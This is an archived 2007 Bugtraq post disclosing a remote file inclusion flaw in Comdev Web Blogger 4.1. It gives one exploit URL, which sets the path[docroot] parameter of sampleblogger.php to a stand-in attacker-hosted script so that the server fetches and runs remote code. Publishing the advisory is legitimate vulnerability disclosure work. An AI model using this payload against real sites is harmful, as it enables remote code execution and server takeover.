Home page logo
/

bugtraq logo Bugtraq mailing list archives

Comdev Web Blogger 4.1 RFI Vulnerability
From: johnnytalker () hotmail com
Date: 3 Jun 2007 01:42:39 -0000

###################################################################################################################################
# 
# Comdev Web Blogger 4.1 RFI Vulnerability
#
###################################################################################################################################
# Infomation:-
#
# Scripts:  Comdev Web Blogger
# Download: 
http://www.comdevweb.com/downloadfile.php?product=BLOGG41&url=http://share.comdevweb.com/download/blogger-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# http://website/oneadmin/blogger/sampleblogger.php?path[docroot]=http://EVILSCRIPT.txt?
#
###################################################################################################################################
#
# Discovered By : [L.T.C]
#
###################################################################################################################################


  By Date           By Thread  

Current thread:
  • Comdev Web Blogger 4.1 RFI Vulnerability johnnytalker (Jun 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault